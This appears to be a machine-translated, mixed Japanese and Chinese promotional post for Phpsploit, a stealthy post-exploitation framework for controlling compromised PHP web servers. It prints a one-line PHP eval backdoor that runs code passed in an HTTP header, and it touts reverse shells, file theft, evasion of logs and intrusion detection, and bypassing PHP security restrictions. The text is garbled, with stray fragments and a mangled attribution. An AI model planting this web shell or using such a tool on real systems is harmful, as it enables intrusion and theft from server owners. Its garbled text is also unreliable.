Phpsploit: 秘密のエクスプロイト後のフレームワーク

Phpsploit は、クライアントとサーバー間のシェル対話型接続を提供するリモート コントロール フレームワークです。 Getshell サーバーを管理して権限昇格を実現する機能。

Phpsploit はポリモーフィック バックドア チャネルを利用して、クライアント リクエストと WEB サーバーの応答の HTTP ヘッダーを介して難読化された通信メカニズムを有効にします:

<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>

機能:

効率 パフォーマンス : 投稿の実装に 20 を超えるプラグインを使用できます -悪用タスクの自動化

  执行命令、浏览文件系统、绕过PHP安全限制；  在目标主机与客户端之间执行文件上传、下载操作；  通过本地编辑器来编辑远程主机上的文件；  在远程主机上运行数据库控制台；  产生反向TCP shell。

E

隠蔽:

  不易被日志分析、NIDS特征检测所识别；  能够绕过安全模式和常见的PHP安全限制；  通信内容隐藏在HTTP头中；  payloads经过混淆来饶过NIDS；  支持http/https/socks4/socks5代理。

移植性:

  在客户端和服务端实现跨平台；  强大的界面、多命令支持；  支持会话保存、载入，提供历史记录功能；

サポート システム:

- - - - - Kitploit

FreeBuf Hackers および G からのものであることを示してくださいえっくす (FreeBuf.COM) 🎜